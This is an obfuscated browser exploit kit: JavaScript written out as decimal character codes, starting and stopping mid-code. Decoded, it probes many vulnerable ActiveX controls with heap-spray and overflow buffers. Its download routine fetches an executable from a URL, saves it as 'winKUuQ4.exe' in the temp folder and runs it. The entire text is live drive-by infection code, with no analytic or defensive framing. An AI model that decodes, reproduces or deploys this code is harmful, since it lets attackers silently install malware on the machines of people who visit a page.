103#116#104#45#49#41#59#13#10#114#101#116#61#100#111#99#117#109#101#110#116#46#99#114#101#97#116#101#69#108#101#109#101#110#116#40#34#111#98#106#101#99#116#34#41#59#13#10#114#101#116#46#115#101#116#65#116#116#114#105#98#117#116#101#40#34#99#108#97#115#115#105#100#34#44#34#99#108#115#105#100#58#34#43#99#108#115#105#100#41#59#13#10#114#101#116#117#114#110#32#114#101#116#59#13#10#125#99#97#116#99#104#40#101#41#123#13#10#114#101#116#117#114#110#32#110#117#108#108#59#13#10#125#13#10#125#101#108#115#101#123#13#10#116#114#121#123#13#10#114#101#116#61#110#101#119#32#65#99#116#105#118#101#88#79#98#106#101#99#116#40#111#98#106#41#59#13#10#114#101#116#117#114#110#32#114#101#116#59#13#10#125#99#97#116#99#104#40#101#41#123#13#10#114#101#116#117#114#110#32#110#117#108#108#59#13#10#125#13#10#125#13#10#125#13#10#102#117#110#99#116#105#111#110#32#67#114#101#97#116#101#79#40#111#44#110#41#123#13#10#118#97#114#32#114#61#110#117#108#108#59#13#10#116#114#121#123#114#61#111#46#67#114#101#97#116#101#79#98#106#101#99#116#40#110#41#125#99#97#116#99#104#40#101#41#123#125#13#10#105#102#40#33#114#41#123#116#114#121#123#114#61#111#46#67#114#101#97#116#101#79#98#106#101#99#116#40#110#44#34#34#41#125#99#97#116#99#104#40#101#41#123#125#125#13#10#105#102#40#33#114#41#123#116#114#121#123#114#61#111#46#67#114#101#97#116#101#79#98#106#101#99#116#40#110#44#34#34#44#34#34#41#125#99#97#116#99#104#40#101#41#123#125#125#13#10#105#102#40#33#114#41#123#116#114#121#123#114#61#111#46#71#101#116#79#98#106#101#99#116#40#34#34#44#110#41#125#99#97#116#99#104#40#101#41#123#125#125#13#10#105#102#40#33#114#41#123#116#114#121#123#114#61#111#46#71#101#116#79#98#106#101#99#116#40#110#44#34#34#41#125#99#97#116#99#104#40#101#41#123#125#125#13#10#105#102#40#33#114#41#123#116#114#121#123#114#61#111#46#71#101#116#79#98#106#101#99#116#40#110#41#125#99#97#116#99#104#40#101#41#123#125#125#13#10#114#101#116#117#114#110#40#114#41#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#71#111#40#97#41#123#13#10#118#97#114#32#101#117#114#108#61#117#114#108#59#13#10#118#97#114#32#102#110#97#109#101#61#34#119#105#110#75#85#117#81#52#46#101#120#101#34#59#13#10#118#97#114#32#102#115#111#61#67#114#101#97#116#101#79#40#97#44#34#83#99#114#105#112#116#105#110#103#46#70#105#108#101#83#121#115#116#101#109#79#98#106#101#99#116#34#41#13#10#118#97#114#32#115#97#112#61#67#114#101#97#116#101#79#40#97#44#34#83#104#101#108#108#46#65#112#112#108#105#99#97#116#105#111#110#34#41#59#13#10#118#97#114#32#120#61#67#114#101#97#116#101#79#40#97#44#34#65#68#79#68#66#46#83#116#114#101#97#109#34#41#59#13#10#118#97#114#32#110#108#61#110#117#108#108#59#13#10#102#110#97#109#101#61#102#115#111#46#66#117#105#108#100#80#97#116#104#40#102#115#111#46#71#101#116#83#112#101#99#105#97#108#70#111#108#100#101#114#40#50#41#44#102#110#97#109#101#41#59#13#10#120#46#77#111#100#101#61#51#59#13#10#116#114#121#123#110#108#61#67#114#101#97#116#101#79#40#97#44#34#77#105#99#114#34#43#34#111#115#111#102#116#46#88#77#76#72#34#43#34#84#84#80#34#41#59#110#108#46#111#112#101#110#40#34#71#69#84#34#44#101#117#114#108#44#102#97#108#115#101#41#59#125#13#10#99#97#116#99#104#40#101#41#123#116#114#121#123#110#108#61#67#114#101#97#116#101#79#40#97#44#34#77#83#88#77#76#50#46#88#77#76#72#84#84#80#34#41#59#110#108#46#111#112#101#110#40#34#71#69#84#34#44#101#117#114#108#44#102#97#108#115#101#41#59#125#13#10#99#97#116#99#104#40#101#41#123#116#114#121#123#110#108#61#67#114#101#97#116#101#79#40#97#44#34#77#83#88#77#76#50#46#83#101#114#118#101#114#88#77#76#72#84#84#80#34#41#59#110#108#46#111#112#101#110#40#34#71#69#84#34#44#101#117#114#108#44#102#97#108#115#101#41#59#125#13#10#99#97#116#99#104#40#101#41#123#116#114#121#123#110#108#61#110#101#119#32#88#77#76#72#116#116#112#82#101#113#117#101#115#116#40#41#59#110#108#46#111#112#101#110#40#34#71#69#84#34#44#101#117#114#108#44#102#97#108#115#101#41#59#125#13#10#99#97#116#99#104#40#101#41#123#114#101#116#117#114#110#32#48#59#125#125#125#125#13#10#120#46#84#121#112#101#61#49#59#13#10#110#108#46#115#101#110#100#40#110#117#108#108#41#59#13#10#114#98#61#110#108#46#114#101#115#112#111#110#115#101#66#111#100#121#59#13#10#120#46#79#112#101#110#40#41#59#13#10#120#46#87#114#105#116#101#40#114#98#41#59#13#10#120#46#83#97#118#101#84#111#102#105#108#101#40#102#110#97#109#101#44#50#41#59#13#10#115#97#112#46#83#104#101#108#108#69#120#101#99#117#116#101#40#102#110#97#109#101#41#59#13#10#114#101#116#117#114#110#32#49#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#109#100#97#99#40#41#32#123#13#10#118#97#114#32#105#61#48#59#13#10#118#97#114#32#116#97#114#103#101#116#61#110#101#119#32#65#114#114#97#121#40#13#10#34#66#68#57#54#67#53#53#54#45#54#53#65#51#45#49#49#68#48#45#57#56#51#65#45#48#48#67#48#52#70#67#50#57#69#51#54#34#44#13#10#34#66#68#57#54#67#53#53#54#45#54#53#65#51#45#49#49#68#48#45#57#56#51#65#45#48#48#67#48#52#70#67#50#57#69#51#48#34#44#13#10#34#65#66#57#66#67#69#68#68#45#69#67#55#69#45#52#55#69#49#45#57#51#50#50#45#68#52#65#50#49#48#54#49#55#49#49#54#34#44#13#10#34#48#48#48#54#70#48#51#51#45#48#48#48#48#45#48#48#48#48#45#67#48#48#48#45#48#48#48#48#48#48#48#48#48#48#52#54#34#44#13#10#34#48#48#48#54#70#48#51#65#45#48#48#48#48#45#48#48#48#48#45#67#48#48#48#45#48#48#48#48#48#48#48#48#48#48#52#54#34#44#13#10#34#54#101#51#50#48#55#48#97#45#55#54#54#100#45#52#101#101#54#45#56#55#57#99#45#100#99#49#102#97#57#49#100#50#102#99#51#34#44#13#10#34#54#52#49#52#53#49#50#66#45#66#57#55#56#45#52#53#49#68#45#65#48#68#56#45#70#67#70#68#70#51#51#69#56#51#51#67#34#44#13#10#34#55#70#53#66#55#70#54#51#45#70#48#54#70#45#52#51#51#49#45#56#65#50#54#45#51#51#57#69#48#51#67#48#65#69#51#68#34#44#13#10#34#48#54#55#50#51#69#48#57#45#70#52#67#50#45#52#51#99#56#45#56#51#53#56#45#48#57#70#67#68#49#68#66#48#55#54#54#34#44#13#10#34#54#51#57#70#55#50#53#70#45#49#66#50#68#45#52#56#51#49#45#65#57#70#68#45#56#55#52#56#52#55#54#56#50#48#49#48#34#44#13#10#34#66#65#48#49#56#53#57#57#45#49#68#66#51#45#52#52#102#57#45#56#51#66#52#45#52#54#49#52#53#52#67#56#52#66#70#56#34#44#13#10#34#68#48#67#48#55#68#53#54#45#55#67#54#57#45#52#51#70#49#45#66#52#65#48#45#50#53#70#53#65#49#49#70#65#66#49#57#34#44#13#10#34#69#56#67#67#67#68#68#70#45#67#65#50#56#45#52#57#54#98#45#66#48#53#48#45#54#67#48#55#67#57#54#50#52#55#54#66#34#44#110#117#108#108#41#59#13#10#119#104#105#108#101#40#116#97#114#103#101#116#91#105#93#41#123#13#10#118#97#114#32#97#61#110#117#108#108#59#13#10#97#61#100#111#99#117#109#101#110#116#46#99#114#101#97#116#101#69#108#101#109#101#110#116#40#34#111#98#106#101#99#116#34#41#59#13#10#97#46#115#101#116#65#116#116#114#105#98#117#116#101#40#34#99#108#97#115#115#105#100#34#44#34#99#108#115#105#100#58#34#43#116#97#114#103#101#116#91#105#93#41#59#13#10#105#102#40#97#41#123#116#114#121#123#118#97#114#32#98#61#67#114#101#97#116#101#79#40#97#44#34#83#104#101#108#108#46#65#112#112#108#105#99#97#116#105#111#110#34#41#59#105#102#40#98#41#123#71#111#40#97#41#59#125#125#99#97#116#99#104#40#101#41#123#125#125#13#10#105#43#43#59#13#10#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#119#102#105#40#41#32#123#13#10#116#114#121#123#13#10#111#98#106#61#99#111#98#106#40#34#87#101#98#86#105#101#119#70#111#108#100#101#114#73#99#111#110#46#87#101#98#86#105#101#119#70#111#108#100#101#114#73#99#111#110#46#49#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#102#111#114#40#118#97#114#32#105#61#48#59#105#60#49#50#56#59#105#43#43#41#123#13#10#118#97#114#32#119#118#102#105#111#61#110#101#119#32#65#99#116#105#118#101#88#79#98#106#101#99#116#40#34#87#101#98#86#105#101#119#70#111#108#100#101#114#73#99#111#110#46#87#101#98#86#105#101#119#70#111#108#100#101#114#73#99#111#110#46#49#34#41#59#13#10#116#114#121#123#119#118#102#105#111#46#115#101#116#83#108#105#99#101#40#48#120#55#102#102#102#102#102#102#101#44#48#44#48#44#50#48#50#49#49#54#49#48#56#41#59#125#99#97#116#99#104#40#101#41#123#125#13#10#118#97#114#32#119#118#102#105#116#61#110#101#119#32#65#99#116#105#118#101#88#79#98#106#101#99#116#40#34#87#101#98#86#105#101#119#70#111#108#100#101#114#73#99#111#110#46#87#101#98#86#105#101#119#70#111#108#100#101#114#73#99#111#110#46#49#34#41#59#13#10#125#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#99#111#109#40#41#32#123#13#10#116#114#121#123#13#10#111#98#106#61#99#111#98#106#40#34#123#69#67#52#52#52#67#66#54#45#51#69#55#69#45#52#56#54#53#45#66#49#67#51#45#48#68#69#55#50#69#70#51#57#66#51#70#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#122#61#77#97#116#104#46#99#101#105#108#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#122#61#100#111#99#117#109#101#110#116#46#115#99#114#105#112#116#115#91#48#93#46#99#114#101#97#116#101#67#111#110#116#114#111#108#82#97#110#103#101#40#41#46#108#101#110#103#116#104#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#121#97#49#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#68#67#69#50#70#56#66#49#45#65#53#50#48#45#49#49#68#52#45#56#70#68#48#45#48#48#68#48#66#55#55#51#48#50#55#55#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#48#48#48#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#48#48#48#41#59#13#10#111#98#106#46#115#101#114#118#101#114#32#61#32#98#117#102#59#13#10#111#98#106#46#105#110#105#116#105#97#108#105#122#101#40#41#59#13#10#111#98#106#46#115#101#110#100#40#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#121#97#50#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#57#68#51#57#50#50#51#69#45#65#69#56#69#45#49#49#68#52#45#56#70#68#51#45#48#48#68#48#66#55#55#51#48#50#55#55#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#48#48#48#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#48#48#48#41#59#13#10#111#98#106#46#115#101#114#118#101#114#32#61#32#98#117#102#59#13#10#111#98#106#46#114#101#99#101#105#118#101#40#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#102#98#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#53#67#54#54#57#56#68#57#45#55#66#69#52#45#52#49#50#50#45#56#69#67#53#45#50#57#49#68#56#52#68#66#68#52#65#48#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#52#48#48#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#52#48#48#41#59#13#10#111#98#106#46#69#120#116#114#97#99#116#73#112#116#99#32#61#32#98#117#102#59#13#10#111#98#106#46#69#120#116#114#97#99#116#69#120#105#102#32#61#32#98#117#102#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#109#100#115#115#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#69#69#69#55#56#53#57#49#45#70#69#50#50#45#49#49#68#48#45#56#66#69#70#45#48#48#54#48#48#56#49#56#52#49#68#69#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#102#111#114#32#40#105#61#49#59#105#60#61#57#57#57#57#59#105#43#43#41#13#10#98#117#102#32#43#61#32#98#117#102#59#13#10#69#110#103#105#110#101#73#68#61#34#100#101#102#97#117#108#116#34#59#13#10#77#102#103#78#97#109#101#61#34#100#101#102#97#117#108#116#34#59#13#10#80#114#111#100#117#99#116#78#97#109#101#61#34#100#101#102#97#117#108#116#34#59#13#10#77#111#100#101#73#68#61#34#100#101#102#97#117#108#116#34#59#13#10#77#111#100#101#78#97#109#101#61#98#117#102#59#13#10#76#97#110#103#117#97#103#101#73#68#61#49#59#13#10#68#105#97#108#101#99#116#61#34#100#101#102#97#117#108#116#34#59#13#10#83#112#101#97#107#101#114#61#34#100#101#102#97#117#108#116#34#59#13#10#83#116#121#108#101#61#49#59#13#10#71#101#110#100#101#114#61#49#59#13#10#65#103#101#61#49#59#13#10#70#101#97#116#117#114#101#115#61#49#59#13#10#73#110#116#101#114#102#97#99#101#115#61#49#59#13#10#69#110#103#105#110#101#70#101#97#116#117#114#101#115#61#49#59#13#10#82#97#110#107#69#110#103#105#110#101#73#68#61#49#59#13#10#82#97#110#107#77#102#103#78#97#109#101#61#49#59#13#10#82#97#110#107#80#114#111#100#117#99#116#78#97#109#101#61#49#59#13#10#82#97#110#107#77#111#100#101#73#68#61#49#59#13#10#82#97#110#107#77#111#100#101#78#97#109#101#61#49#59#13#10#82#97#110#107#76#97#110#103#117#97#103#101#61#49#59#13#10#82#97#110#107#68#105#97#108#101#99#116#61#49#59#13#10#82#97#110#107#83#112#101#97#107#101#114#61#49#59#13#10#82#97#110#107#83#116#121#108#101#61#49#59#13#10#82#97#110#107#71#101#110#100#101#114#61#49#59#13#10#82#97#110#107#65#103#101#61#49#59#13#10#82#97#110#107#70#101#97#116#117#114#101#115#61#49#59#13#10#82#97#110#107#73#110#116#101#114#102#97#99#101#115#61#49#59#13#10#82#97#110#107#69#110#103#105#110#101#70#101#97#116#117#114#101#115#61#49#59#13#10#111#98#106#46#70#105#110#100#69#110#103#105#110#101#40#69#110#103#105#110#101#73#68#44#32#77#102#103#78#97#109#101#44#32#80#114#111#100#117#99#116#78#97#109#101#44#32#77#111#100#101#73#68#44#32#77#111#100#101#78#97#109#101#44#32#76#97#110#103#117#97#103#101#73#68#44#32#68#105#97#108#101#99#116#44#32#83#112#101#97#107#101#114#44#32#83#116#121#108#101#44#32#71#101#110#100#101#114#44#32#65#103#101#44#32#70#101#97#116#117#114#101#115#44#32#73#110#116#101#114#102#97#99#101#115#44#32#69#110#103#105#110#101#70#101#97#116#117#114#101#115#44#32#82#97#110#107#69#110#103#105#110#101#73#68#44#32#82#97#110#107#77#102#103#78#97#109#101#44#32#82#97#110#107#80#114#111#100#117#99#116#78#97#109#101#44#32#82#97#110#107#77#111#100#101#73#68#44#32#82#97#110#107#77#111#100#101#78#97#109#101#44#32#82#97#110#107#76#97#110#103#117#97#103#101#44#32#82#97#110#107#68#105#97#108#101#99#116#44#32#82#97#110#107#83#112#101#97#107#101#114#44#32#82#97#110#107#83#116#121#108#101#44#32#82#97#110#107#71#101#110#100#101#114#44#32#82#97#110#107#65#103#101#44#32#82#97#110#107#70#101#97#116#117#114#101#115#44#32#82#97#110#107#73#110#116#101#114#102#97#99#101#115#44#32#82#97#110#107#69#110#103#105#110#101#70#101#97#116#117#114#101#115#41#59#13#10#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#13#10#102#117#110#99#116#105#111#110#32#111#102#102#105#99#101#40#41#123#13#10#118#97#114#32#115#102#114#111#109#32#61#32#117#114#108#43#34#38#111#112#114#61#49#34#59#13#10#118#97#114#32#102#117#99#107#97#118#111#61#34#83#66#34#59#13#10#118#97#114#32#120#59#13#10#118#97#114#32#102#117#99#107#97#118#112#61#34#83#66#34#59#13#10#118#97#114#32#111#98#106#59#13#10#118#97#114#32#102#117#99#107#97#118#120#61#34#83#66#34#59#13#10#118#97#114#32#109#121#99#97#114#115#32#61#32#110#101#119#32#65#114#114#97#121#40#41#59#13#10#118#97#114#32#102#117#99#107#97#118#97#61#34#83#66#34#59#13#10#109#121#99#97#114#115#91#48#93#32#61#32#34#99#58#47#80#114#111#103#114#97#109#32#70#105#108#101#115#47#79#117#116#108#111#111#107#32#69#120#112#114#101#115#115#47#87#65#66#46#69#88#69#34#59#13#10#109#121#99#97#114#115#91#49#93#32#61#32#34#100#58#47#80#114#111#103#114#97#109#32#70#105#108#101#115#47#79#117#116#108#111#111#107#32#69#120#112#114#101#115#115#47#87#65#66#46#69#88#69#34#59#13#10#109#121#99#97#114#115#91#50#93#32#61#32#34#101#58#47#80#114#111#103#114#97#109#32#70#105#108#101#115#47#79#117#116#108#111#111#107#32#69#120#112#114#101#115#115#47#87#65#66#46#69#88#69#34#59#13#10#118#97#114#32#111#98#106#108#99#120#32#61#32#99#111#98#106#40#34#115#110#112#118#119#46#83#110#97#112#115#104#111#116#32#86#105#101#119#101#114#32#67#111#110#116#114#111#108#46#49#34#41#59#13#10#105#102#40#111#98#106#108#99#120#41#32#123#13#10#115#101#116#84#105#109#101#111#117#116#40#39#119#105#110#100#111#119#46#108#111#99#97#116#105#111#110#32#61#32#34#108#100#97#112#58#47#47#34#39#44#32#51#48#48#48#41#59#13#10#102#111#114#32#40#120#32#105#110#32#109#121#99#97#114#115#41#123#13#10#111#98#106#32#61#32#99#111#98#106#40#34#115#110#112#118#119#46#83#110#97#112#115#104#111#116#32#86#105#101#119#101#114#32#67#111#110#116#114#111#108#46#49#34#41#13#10#118#97#114#32#98#117#102#49#32#61#32#115#102#114#111#109#59#13#10#118#97#114#32#102#117#99#107#97#118#103#61#34#83#66#34#59#13#10#118#97#114#32#98#117#102#50#61#109#121#99#97#114#115#91#120#93#59#13#10#118#97#114#32#102#117#99#107#97#118#106#61#34#83#66#34#59#13#10#111#98#106#46#90#111#111#109#32#61#32#48#59#13#10#111#98#106#46#83#104#111#119#78#97#118#105#103#97#116#105#111#110#66#117#116#116#111#110#115#32#61#32#102#97#108#115#101#59#13#10#111#98#106#46#65#108#108#111#119#67#111#110#116#101#120#116#77#101#110#117#32#61#32#102#97#108#115#101#59#13#10#111#98#106#46#83#110#97#112#115#104#111#116#80#97#116#104#32#61#32#98#117#102#49#59#13#10#116#114#121#32#123#13#10#111#98#106#46#67#111#109#112#114#101#115#115#101#100#80#97#116#104#32#61#32#98#117#102#50#59#13#10#111#98#106#46#80#114#105#110#116#83#110#97#112#115#104#111#116#40#41#59#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#125#13#10#125#13#10#118#97#114#32#102#117#99#107#97#118#113#103#103#97#61#34#83#66#34#59#13#10#118#97#114#32#102#117#99#107#97#118#113#103#103#120#97#61#34#83#66#100#34#59#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#100#108#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#68#111#119#110#108#111#97#100#101#114#46#68#76#111#97#100#101#114#46#49#34#41#59#13#10#105#102#32#40#111#98#106#41#123#13#10#111#98#106#46#68#111#119#110#108#111#97#100#65#110#100#73#110#115#116#97#108#108#40#117#114#108#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#119#107#115#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#48#48#69#49#68#66#53#57#45#54#69#70#68#45#52#67#69#55#45#56#67#48#65#45#50#68#65#51#66#67#65#65#68#57#67#54#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#110#117#109#32#61#32#50#48#50#49#49#54#49#48#56#59#13#10#111#98#106#46#87#107#115#80#105#99#116#117#114#101#73#110#116#101#114#102#97#99#101#32#61#32#110#117#109#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#111#103#97#109#101#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#70#57#49#55#53#51#52#68#45#53#51#53#66#45#52#49#54#66#45#56#69#56#70#45#48#67#48#52#55#53#54#67#51#49#65#56#125#34#41#59#13#10#105#102#40#111#98#106#41#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#34#34#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#54#48#48#41#32#98#117#102#32#43#61#32#34#92#120#48#99#92#120#48#99#92#120#48#99#92#120#48#99#34#59#13#10#111#98#106#46#73#69#83#116#97#114#116#78#97#116#105#118#101#40#98#117#102#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#99#97#40#41#123#13#10#116#114#121#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#61#99#111#98#106#40#34#123#66#70#54#69#70#70#70#51#45#52#53#53#56#45#52#67#52#67#45#65#68#65#70#45#65#56#55#56#57#49#67#53#70#51#65#51#125#34#41#59#13#10#105#102#32#40#111#98#106#46#65#100#100#67#111#108#117#109#110#41#32#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#32#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#119#104#105#108#101#40#98#117#102#46#108#101#110#103#116#104#32#60#32#49#50#56#41#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#32#49#50#56#41#59#13#10#111#98#106#46#65#100#100#67#111#108#117#109#110#40#98#117#102#44#49#41#59#13#10#125#13#10#125#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#98#117#100#100#121#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#83#98#46#83#117#112#101#114#66#117#100#100#121#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#109#115#40#41#59#13#10#111#98#106#46#76#105#110#107#83#66#73#99#111#110#115#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#103#111#109#119#101#98#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#71#111#109#87#101#98#67#116#114#108#46#71#111#109#77#97#110#97#103#101#114#46#49#34#41#59#13#10#105#102#32#40#111#98#106#41#32#123#13#10#109#115#40#41#59#13#10#118#97#114#32#98#117#102#61#34#65#65#65#65#34#59#13#10#119#104#105#108#101#32#40#98#117#102#46#108#101#110#103#116#104#32#60#32#53#48#54#41#32#98#117#102#32#43#61#32#98#117#102#59#13#10#98#117#102#32#61#32#98#117#102#46#115#117#98#115#116#114#105#110#103#40#48#44#53#48#54#41#59#13#10#98#117#102#32#43#61#32#97#100#100#114#40#48#120#48#99#48#99#48#99#48#99#41#59#13#10#111#98#106#46#79#112#101#110#85#82#76#40#98#117#102#41#59#13#10#125#13#10#125#32#99#97#116#99#104#40#101#41#123#125#13#10#114#101#116#117#114#110#32#48#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#120#109#108#99#111#114#101#40#41#123#13#10#116#114#121#32#123#13#10#118#97#114#32#120#109#108#32#61#32#110#117#108#108#59#13#10#118#97#114#32#120#109#108#32#61#32#99#111#98#106#40#34#77#115#120#109#108#50#46#88#77#76#72#84#84#80#46#54#46#48#34#41#59#13#10#105#102#32#40#120#109#108#41#123#13#10#120#109#108#32#61#32#99#111#98#106#40#34#77#115#120#109#108#50#46#88#77#76#72#84#84#80#46#52#46#48#34#41#59#13#10#125#13#10#105#102#40#33#120#109#108#41#114#101#116#117#114#110#32#48#59#13#10#118#97#114#32#111#98#106#61#110#117#108#108#59#13#10#111#98#106#32#61#32#99#111#98#106#40#34#123#56#56#100#57#54#57#99#53#45#102#49#57#50#45#49#49#100#52#45#97#54#53#102#45#48#48#52#48#57#54#51#50#53#49#101#53#125#34#41#59#13#10#111#98#106#32#61#32#111#98#106#46#111#98#106#101#99#116#13#10#105#102#40#111#98#106#41#32#123#13#10#109#115#40#41#59#13#10#116#114#121#32#123#111#98#106#46#111#112#101#110#40#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#44#110#101#119#32#65#114#114#97#121#40#41#41#59#125#32#99#97#116#99#104#40#101#41#32#123#125#59#13#10#111#98#106#46#111#112#101#110#40#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#44#110#101#119#32#79#98#106#101#99#116#40#41#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#34#46#46#46#34#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#49#54#54#54#48#41#59#13#10#111#98#106#46#115#101#116#82#101#113#117#101#115#116#72#101#97#100#101#114#40#110#101#119#32#79#98#106#101#99#116#40#41#44#48#120#49#48#